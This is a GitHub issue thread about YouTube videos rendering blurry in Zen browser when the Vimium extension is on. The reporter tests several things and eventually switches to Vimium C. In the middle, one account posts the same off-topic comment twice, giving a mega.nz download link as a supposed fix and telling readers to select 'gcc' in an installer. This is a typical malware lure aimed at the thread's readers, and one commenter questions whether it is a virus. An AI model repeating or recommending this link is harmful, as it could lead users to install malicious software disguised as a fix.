### ISSUE TITLE
Youtube video shows up blurry in Zen browser

### ISSUE THREAD

**Issue by CyberReaper00** [philc/vimium#4536]
I installed zen
Installed some extensions
Opened youtube
Put on a video
Shows up blurry, sound plays just fine
Pre-roll ad plays perfectly fine

I looked around and found that turning off DNS-over-HTTPS would help
problem continues

I installed uBlock Origin, thinking that might help
problem continues

I disabled all extensions and everything was fine, then I enabled Vimium and the problem came back

**To Reproduce**

Enable the Vimium extension, problem appears
Disable the Vimium extension, problem disappears

Here's what it looks like,
as you can see the video is a blur but the timeline view shows up clear as day
i have no idea what's happening?

![image](https://github.com/user-attachments/assets/645131dd-f30f-447d-906f-0a8aa145b2c3)

**Browser and Vimium version**

**Zen Browser:** 1.0.0-a.29
**OS:** Windows_NT 10.0 22621
**Vimium:** 2.1.2

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by N3XUS-12** [comment]
> Download https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU In the installer menu, select "gcc."

Are you sure you're not sending a virus

**Comment by UncleSnail** [comment]
That is very odd. Unfortunately, there probably isn't much we can do to help. Does uninstalling all addons fix the problem? When you reinstall/enable Vimium _by itself_ (no other addons) does the problem occur?

**Comment by CyberReaper00** [comment]
i completely forgot i made this, here is what i found

i turned off vimium, reloaded the page and the video was there
i pulled the inspector on the video, turned on vimium and reloaded the page
as soon as it does that, i immediately lose track of the video and its surrounding tags, it got pretty confusing

after that i tried re-installing vimium but in doing so, i found another extension called **Vimium C**
i installed that and it worked immediately, without any problems at all

i could not find an actual solution for the Vimium extension, but since i dont need to anymore i stopped looking
the other one has been working fine, and i'm just using that now

i'm just going to close this, since there is no need for a fix anymore
